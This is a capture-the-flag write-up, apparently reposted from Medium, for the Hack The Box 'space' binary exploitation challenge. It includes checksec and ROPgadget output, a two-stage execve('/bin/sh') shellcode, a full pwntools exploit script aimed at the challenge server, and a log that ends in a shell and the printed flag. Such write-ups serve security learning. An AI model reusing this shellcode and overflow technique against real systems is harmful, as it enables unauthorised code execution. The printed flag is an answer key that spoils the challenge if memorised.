Hack-The-Box-pwn-challenge[space]

Posted on Edited on In , Views: Word count in article: 785 Reading time ≈ 3 mins.

详细过程及exp

1. Basic checks:

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# file space
space: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=90e5767272e16e26e1980cb78be61437b3d63e12, not stripped
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# checksec space
[*] '/root/hackthebox/challenge/pwn/space/space'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

2. Debug binary with buffer overflow string as input:

3. Check the EIP offset:

4. Control EIP with custom bytes:

5. Check the space for the custom payload:

There is 18B + 9B space split by 4 Bytes for the EIP register.

So payload could look like great post https://www.abatchy.com/2017/05/jumping-to-shellcode.html:

1
2
3
4
# Payload skeleton:
1. [2nd_stage_shellcode]                           = 18B
2. [EIP] - jump to 1st_stage_shellcode             = 4B
3. [1st_stage_shellcode + jmp 2nd_stage_shellcode] = 9B

6. Find ROP gadget for EIP to start shellcode:

Basically, “jmp esp” just jump into execution flow on the next instruction on the stack,
which will be 1st_stage shellcode and another jump.

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# ROPgadget --binary space | grep "jmp esp"
0x08049199 : add byte ptr [0x212a], al ; jmp esp
0x08049197 : add byte ptr [eax], al ; add byte ptr [0x212a], al ; jmp esp
0x08049198 : add byte ptr [eax], al ; add eax, 0x212a ; jmp esp
0x0804919d : add byte ptr [eax], al ; jmp esp
0x0804919a : add eax, 0x212a ; jmp esp
0x0804919f : jmp esp
0x0804919b : sub ah, byte ptr [ecx] ; add byte ptr [eax], al ; jmp esp
0x08049196 : test eax, 0x5000000 ; sub ah, byte ptr [ecx] ; add byte ptr [eax], al ; jmp esp

7. Shellcode writing:

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# python -c 'from pwn import *; print(disasm("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\xb0\x0b\xcd\x80"))'
   0:   31 c0                   xor    eax, eax
   2:   50                      push   eax
   3:   68 2f 2f 73 68          push   0x68732f2f
   8:   68 2f 62 69 6e          push   0x6e69622f
   d:   89 e3                   mov    ebx, esp
   f:   89 c1                   mov    ecx, eax
  11:   b0 0b                   mov    al, 0xb
  13:   cd 80                   int    0x80

8. Shellcode customization:

EAX stores (18B + 4B + 9B) data provided as input during overflow.

Without the “mov esp, eax” step, second_stage_shellcode would break the execution flow, because pushed “0x6e69622f” would be treated as data to execute, while it should be stored for further executed syscall and treated as an argument for execve() stored in EBX register. https://security.stackexchange.com/questions/98311/problems-executing-shellcode-via-nop-sled

Then set up EAX and ECX registers to 0. A short jump to the first 18B on the stack. Great article which explains, why we jump 0xe2 — available https://thestarman.pcministry.com/asm/2bytejumps.htm

Secondly, we just set up arguments for the execve().
(Check this article, if you don’t know CDQ instruction)

Final shellcode:

9. Working exploit:

  • getflag.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *

context.log_level = "debug"
second_stage_shellcode = "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x99\xb0\x0b\xcd\x80"
print("[+] second_stage_shellcode:", second_stage_shellcode)
eip = p32(0x0804919f)
print("[+] eip address:", eip)
first_stage_shellcode = "\x89\xc4\x31\xc0\x89\xc1\xeb\xe2"
print("[+] first_stage_shellcode:", first_stage_shellcode)
payload = second_stage_shellcode + eip + first_stage_shellcode
print("[+] final shellcode payload:", payload)

p = remote("46.101.23.188",32417)

p.writeafter("> ",payload)
print("[+] sending first_stage_shellcode + second_stage_shellcode...")
p.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
┌──(root💀kali)-[~/hackthebox/challenge/pwn/space]
└─# python getflag.py
('[+] second_stage_shellcode:', 'Ph//shh/bin\x89\xe3\x99\xb0\x0b\xcd\x80')
('[+] eip address:', '\x9f\x91\x04\x08')
('[+] first_stage_shellcode:', '\x89\xc41\xc0\x89\xc1\xeb\xe2')
('[+] final shellcode payload:', 'Ph//shh/bin\x89\xe3\x99\xb0\x0b\xcd\x80\x9f\x91\x04\x08\x89\xc41\xc0\x89\xc1\xeb\xe2')
[+] Opening connection to 46.101.23.188 on port 32417: Done
[DEBUG] Received 0x2 bytes:
    '> '
[DEBUG] Sent 0x1e bytes:
    00000000  50 68 2f 2f  73 68 68 2f  62 69 6e 89  e3 99 b0 0b  │Ph//│shh/│bin·│····│
    00000010  cd 80 9f 91  04 08 89 c4  31 c0 89 c1  eb e2        │····│····│1···│··│
    0000001e
[+] sending first_stage_shellcode + second_stage_shellcode...
[*] Switching to interactive mode
$ id
[DEBUG] Sent 0x3 bytes:
    'id\n'
[DEBUG] Received 0x2a bytes:
    'uid=999(ctf) gid=999(ctf) groups=999(ctf)\n'
uid=999(ctf) gid=999(ctf) groups=999(ctf)
$ whoami
[DEBUG] Sent 0x7 bytes:
    'whoami\n'
[DEBUG] Received 0x4 bytes:
    'ctf\n'
ctf
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x20 bytes:
    'flag.txt\n'
    'run_challenge.sh\n'
    'space\n'
flag.txt
run_challenge.sh
space
$ cat flag.txt
[DEBUG] Sent 0xd bytes:
    'cat flag.txt\n'
[DEBUG] Received 0x1c bytes:
    'HTB{sh3llc0de_1n_7h3_5p4c3}\n'
HTB{sh3llc0de_1n_7h3_5p4c3}

摘自(致敬原作)……

  • 浏览medium.com博客每月有次数限制,并且5$收费,故摘录文章。。。
  • PWN Space challenge - HTB